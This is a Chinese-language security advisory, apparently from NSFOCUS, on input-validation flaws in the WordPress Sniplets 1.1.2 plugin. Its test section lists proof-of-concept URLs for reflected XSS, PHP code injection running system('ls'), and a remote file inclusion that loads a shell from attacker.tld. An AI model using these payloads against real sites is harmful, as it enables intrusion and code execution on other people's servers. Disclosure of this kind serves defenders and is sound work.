安全研究
安全漏洞
WordPress Sniplets插件多个输入验证漏洞
发布日期:2008-02-25
更新日期:2008-02-28
受影响系统:
WordPress Sniplets 1.1.2描述:
BUGTRAQ ID: 27985
WordPress是一款免费的论坛Blog系统。
WordPress的Sniplets插件中存在多个输入验证错误,允许远程攻击者执行跨站脚本攻击、泄露敏感信息或入侵有漏洞的系统。
1) modules/syntax_highlight.php文件中没有正确的验证对libpath参数的输入,可能允许攻击者包含本地或外部资源的任意文件。
2) 在调用eval()之前modules/execute.php文件中没有正确的过滤对text参数的输入,允许攻击者通过提交特制的参数值注入并执行任意PHP代码。
3) view/admin/pager.php文件中没有正确的过滤对page参数的输入便返回给了用户,导致在用户浏览器会话中执行任意HTML和脚本代码。
4) view/sniplets/warning.php、view/sniplets/notice.php、view/sniplets/inset.php和modules/execute.php文件中没有正确的验证对text参数的输入,view/admin/submenu.php文件中没有正确的验证对url参数的输入,便返回给了用户,导致在用户浏览器会话中执行任意HTML和脚本代码。
成功利用这些漏洞要求打开了register_globals。
<*来源:NBBN (nbbn@gmx.net)
链接:http://secunia.com/advisories/29099/
http://marc.info/?l=bugtraq&m=120396627514810&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?
http://www.example.com/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.example.com/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/
浏览次数:2916
严重程度:0(网友投票)
绿盟科技给您安全的保障